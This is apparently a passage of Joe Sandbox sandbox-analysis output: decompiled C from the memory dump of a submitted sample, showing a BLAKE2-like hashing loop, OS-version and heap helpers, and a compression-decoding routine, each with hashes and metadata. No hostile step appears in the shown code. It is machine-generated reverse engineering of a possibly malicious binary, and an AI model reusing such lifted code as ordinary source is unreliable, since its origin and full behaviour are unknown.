					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0x93688; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0x93689; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0x9368a; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0x9368b; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0x9368c; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0x9368d; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0x9368e; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0x9368f; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

0x00064084
0x0006409e
0x000640a6
0x000640ae
0x000640ae
0x000640ba
0x000640bd
0x000640bd
0x000640c9
0x000640cf
0x000640d5
0x000640db
0x000640df
0x000640e8
0x000640f1
0x000640f7
0x00064100
0x0006410a
0x00064112
0x0006411a
0x00064122
0x0006412a
0x00064132
0x00064136
0x0006413a
0x0006413e
0x00064142
0x00064146
0x0006414e
0x00064152
0x00064156
0x00064156
0x0006416a
0x00064170
0x00064174
0x0006417a
0x0006417d
0x0006417f
0x00064181
0x00064185
0x00064189
0x0006418c
0x00064190
0x000641a4
0x000641aa
0x000641ae
0x000641b4
0x000641b7
0x000641bb
0x000641bf
0x000641c2
0x000641ce
0x000641e0
0x000641e6
0x000641ea
0x000641f0
0x000641f3
0x000641f5
0x000641f7
0x000641fb
0x000641ff
0x00064202
0x00064206
0x0006421a
0x00064220
0x00064224
0x0006422a
0x0006422d
0x00064231
0x00064235
0x00064238
0x00064240
0x00064254
0x0006425c
0x00064262
0x00064265
0x00064267
0x00064269
0x0006426d
0x00064271
0x00064274
0x00064284
0x0006428a
0x0006428e
0x00064294
0x00064297
0x0006429b
0x0006429f
0x000642a2
0x000642a6
0x000642aa
0x000642bc
0x000642c2
0x000642c6
0x000642cc
0x000642cf
0x000642d1
0x000642d3
0x000642d7
0x000642e2
0x000642ee
0x000642f4
0x000642f8
0x000642fe
0x00064301
0x00064305
0x00064309
0x0006430c
0x00064310
0x00064314
0x00064326
0x0006432c
0x00064330
0x00064336
0x00064339
0x0006433b
0x0006433d
0x00064341
0x0006434c
0x00064358
0x0006435e
0x00064362
0x00064366
0x0006436c
0x0006436f
0x00064371
0x00064373
0x00064377
0x0006437b
0x0006437f
0x00064382
0x00064386
0x0006438a
0x00064391
0x0006439e
0x000643a0
0x000643a4
0x000643ae
0x000643b1
0x000643b3
0x000643b5
0x000643b9
0x000643bd
0x000643c0
0x000643d0
0x000643d6
0x000643da
0x000643de
0x000643e4
0x000643e7
0x000643e9
0x000643eb
0x000643ef
0x000643f3
0x000643f7
0x000643fa
0x000643fe
0x00064402
0x00064409
0x00064416
0x0006441c
0x00064420
0x00064426
0x00064429
0x0006442b
0x0006442d
0x00064431
0x00064435
0x00064438
0x00064448
0x0006444e
0x00064452
0x00064456
0x0006445c
0x0006445f
0x00064461
0x00064463
0x00064467
0x0006446a
0x0006446e
0x00064472
0x00064476
0x0006447a
0x0006448c
0x00064492
0x00064496
0x0006449c
0x0006449f
0x000644a1
0x000644a3
0x000644a7
0x000644b2
0x000644be
0x000644c0
0x000644c4
0x000644c8
0x000644ca
0x000644d1
0x000644d3
0x000644d5
0x000644d9
0x000644e1
0x000644e4
0x000644e7
0x000644eb
0x000644ef
0x000644f3
0x000644f7
0x000644fb
0x00064506
0x0006450d
0x00064514
0x0006451b
0x0006451f
0x00064523
0x0006452a
0x0006452a
0x00064537
0x0006453b
0x0006453e
0x00064541
0x00064550

Strings

gj, xrefs: 000640C1

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 13892aa19c134a13c979dc7ffa9b5a75d2fa3b9f418c25bb1111c8b699b58b0c
Instruction ID: a28b17fc3c8e046b66efb0583971f65245f0a19bb6f80dac422baae2610ab0c2
Opcode Fuzzy Hash: 13892aa19c134a13c979dc7ffa9b5a75d2fa3b9f418c25bb1111c8b699b58b0c
Instruction Fuzzy Hash: A5F1C2B2A083418FC758CF29D880A5AFBE1BFCC208F15892EF598D7711E634E9558F56

Uniqueness

Uniqueness Score: -1.00%

Function 0006ACF5 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0006ACF5() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x9e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xa0f60; // 0xa
					_t13 =  *0xa0f64; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x9e020 = _t12;
					 *0xa0f60 = _t6;
					 *0xa0f64 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x0006acf8
0x0006ad07
0x0006ad45
0x0006ad4a
0x0006ad09
0x0006ad0f
0x0006ad1a
0x0006ad20
0x0006ad26
0x0006ad2c
0x0006ad32
0x0006ad38
0x0006ad3d
0x0006ad3d
0x0006ad53
0x00000000
0x0006ad55
0x00000000
0x0006ad58

APIs

GetVersionExW.KERNEL32(?), ref: 0006AD1A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 05bf113355b076ba1da59a61792dee042f26bf7767474f8ea9ea3bdacc59d2d4
Instruction ID: be5038a788caf48e8e1b10862dfa722cce57570a5b04170da6fba39c9dc51b03
Opcode Fuzzy Hash: 05bf113355b076ba1da59a61792dee042f26bf7767474f8ea9ea3bdacc59d2d4
Instruction Fuzzy Hash: 80F090B0E0020C8FD738DF18EC416E973B2F78A301F2002A6DA1563754D379AD80CE61

Uniqueness

Uniqueness Score: -1.00%

Function 0008B710 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008B710() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xc16ec = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x0008b710
0x0008b718
0x0008b720

APIs

GetProcessHeap.KERNEL32 ref: 0008B710

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c7264a9aeef0d00a39aefc62435b54f0903548d1846fa9f143e8d67e4d37d8c2
Instruction ID: 5ade46905d4ca1d9705e3cd4219b8ee767c8c04c238a6b273d42ba55e3d81d1d
Opcode Fuzzy Hash: c7264a9aeef0d00a39aefc62435b54f0903548d1846fa9f143e8d67e4d37d8c2
Instruction Fuzzy Hash: 28A001B86012018BA7408F76AA197493AA9BB46695709826AA509C6171EA2885609F01

Uniqueness

Uniqueness Score: -1.00%

Function 00075C77 Relevance: .8, Instructions: 800
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00075C77(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E00074BB3(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E000737C1(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E00073D6D(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E000747FB(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E0006A800(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x18) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E0006A800(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E0006A800(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x18);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x18) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E0007F4B0(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E00072504();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
																		if( *((char*)(_t638 + 0x4c44)) == 0) {
																			L106:
																			_t537 =  *(_t638 + 0x7c);
																			_t614 =  *(_t638 + 0x60);
																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																			_t468 = _t537 - _t614;
																			__eflags = _t468 - _t399;
																			if(_t468 >= _t399) {
																				L125:
																				__eflags = _t632;
																				if(_t632 == 0) {
																					while(1) {
																						L0:
																						_t638 = __esi;
																						_t598 = __esi + 0x7c;
																						L1:
																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																							goto L12;
																						} else {
																							_t637 = _t638 + 0x8c;
																						}
																					}
																				}
																				L126:
																				_t648 =  *(_t638 + 0xe6dc);
																				do {
																					L127:
																					_t649 = _t648 & _t468;
																					_t468 = _t468 + 1;
																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
																					_t598 = _t638 + 0x7c;
																					_t648 =  *(_t638 + 0xe6dc);
																					 *_t598 =  *_t598 + 0x00000001 & _t648;
																					_t632 = _t632 - 1;
																					__eflags = _t632;
																				} while (_t632 != 0);
																				L161:
																				_t643 = _t638 + 4;
																				goto L1;
																			}
																			L107:
																			__eflags = _t537 - _t399;
																			if(_t537 >= _t399) {
																				goto L125;
																			}
																			L108:
																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
																			_t468 = _t468 + _t400;
																			_t646 = _t400 + _t537;
																			 *(_t638 + 0x7c) = _t537 + _t632;
																			__eflags = _t614 - _t632;
																			if(_t614 >= _t632) {
																				L113:
																				__eflags = _t632 - 8;
																				if(_t632 < 8) {
																					L117:
																					_t598 = _t638 + 0x7c;
																					__eflags = _t632;
																					if(_t632 == 0) {
																						goto L161;
																					}
																					L118:
																					_t598 = _t638 + 0x7c;
																					 *_t646 =  *_t468;
																					__eflags = _t632 - 1;
																					if(_t632 <= 1) {
																						goto L161;
																					}
																					L119:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																					__eflags = _t632 - 2;
																					if(_t632 <= 2) {
																						goto L161;
																					}
																					L120:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																					__eflags = _t632 - 3;
																					if(_t632 <= 3) {
																						goto L161;
																					}
																					L121:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																					__eflags = _t632 - 4;
																					if(_t632 <= 4) {
																						goto L161;
																					}
																					L122:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																					__eflags = _t632 - 5;
																					if(_t632 <= 5) {
																						goto L161;
																					}
																					L123:
																					_t598 = _t638 + 0x7c;
																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																					__eflags = _t632 - 6;
																					if(_t632 <= 6) {
																						goto L161;
																					}
																					L124:
																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																					while(1) {
																						L0:
																						_t638 = __esi;
